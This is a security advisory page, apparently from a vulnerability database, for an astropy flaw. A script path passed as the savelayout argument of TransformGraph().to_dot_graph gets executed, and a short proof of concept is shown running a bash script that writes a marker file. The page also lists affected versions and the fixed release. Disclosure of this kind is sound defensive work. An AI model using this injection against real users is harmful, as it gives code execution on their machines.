PYSEC-2026-1199

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/astropy/PYSEC-2026-1199.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1199
Aliases
Published
2026-07-07T11:45:35.644849Z
Modified
2026-07-07T17:46:32.339478083Z
Severity
  • 8.4 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
RCE in TranformGraph().to_dot_graph function
Details

Summary

RCE due to improper input validation in TranformGraph().todotgraph function

Details

Due to improper input validation a malicious user can provide a command or a script file as a value to savelayout argument, which will be placed as the first value in a list of arguments passed to subprocess.Popen. https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539 Although an error will be raised, the command or script will be executed successfully.

PoC

$ cat /tmp/script
#!/bin/bash
echo astrorce > /tmp/poc.txt
$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from astropy.coordinates.transformations import TransformGraph
>>> tg = TransformGraph()
>>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph
    stdout, stderr = proc.communicate(dotgraph)
  File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate
    input_view = memoryview(self._input)
TypeError: memoryview: a bytes-like object is required, not 'str'
>>> 
$ cat /tmp/poc.txt
astrorce

Impact

code execution on the user's machine

References

Affected packages

PyPI / astropy

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
5.3.3

Affected versions

0.*
0.1
0.2
0.2.1
0.2.2
0.2.3
0.2.4
0.2.5
0.3
0.3.1
0.3.2
0.4rc1
0.4rc2
0.4
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6
1.*
1.0rc1
1.0rc2
1.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.0.10
1.0.11
1.0.12
1.0.13
1.1b1
1.1rc1
1.1rc2
1.1
1.1.post1
1.1.post2
1.1.1
1.1.2
1.2rc1
1.2
1.2.1
1.2.2
1.3rc1
1.3
1.3.1
1.3.2
1.3.3
2.*
2.0rc1
2.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6
2.0.7
2.0.8
2.0.9
2.0.10
2.0.11
2.0.12
2.0.13
2.0.14
2.0.15
2.0.16
3.*
3.0rc1
3.0rc2
3.0
3.0.1
3.0.2
3.0.3
3.0.4
3.0.5
3.1rc1
3.1rc2
3.1
3.1.1
3.1.2
3.2rc1
3.2rc2
3.2
3.2.1
3.2.2
3.2.3
4.*
4.0rc1
4.0rc2
4.0
4.0.1
4.0.1.post1
4.0.2
4.0.3
4.0.4
4.0.5
4.0.6.dev27461
4.0.6
4.1rc1
4.1rc2
4.1
4.2rc1
4.2
4.2.1
4.3rc1
4.3
4.3.post1
4.3.1
5.*
5.0rc1
5.0rc2
5.0
5.0.1
5.0.2
5.0.3
5.0.4
5.0.5
5.0.6
5.0.7
5.0.8
5.1rc1
5.1
5.1.1
5.2.dev0
5.2rc1
5.2
5.2.1
5.2.2
5.3rc1
5.3
5.3.1
5.3.2

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/astropy/PYSEC-2026-1199.yaml"